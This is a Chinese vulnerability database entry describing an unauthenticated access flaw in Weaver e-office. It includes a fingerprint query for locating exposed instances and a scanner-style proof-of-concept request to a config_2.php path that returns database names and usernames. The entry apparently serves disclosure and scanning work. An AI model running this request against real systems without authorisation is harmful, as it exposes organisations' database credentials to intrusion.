泛微e-office 未授权访问漏洞复现

detail:  ID: 5285  Author: 匿名作者  Name: 泛微e-office 未授权访问  Description: 泛微e-office是一种企业办公自动化软件解决方案，由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office    存在未授权访问，攻击者可以访问页面获取敏感信息。  Identifier:    DVB: DVB-2023-5285  VulnClass:  - 认证绕过/未认证  Category:  - 应用服务  Manufacturer: 泛微  Product: e-office  Type: 1  Status: 1  Scanable: 1  Level: 2  DisclosureDate: '2023-10-18'  Is0day: false  IncludeExp: false  Weakable: false  IsXc: false  IsCommon: false  IsCallBack: false  Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php"  Solutions:  - 请关注厂商的修复版本，并及时更新到最新版本.poc:  relative: req0  session: false  requests:  - method: GET    timeout: 10    path: /building/backmgr/urlpage/mobileurl/config_2.php    headers:      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like        Gecko) Chrome/83.0.2597.132 Safari/537.36    follow_redirects: true    matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名"))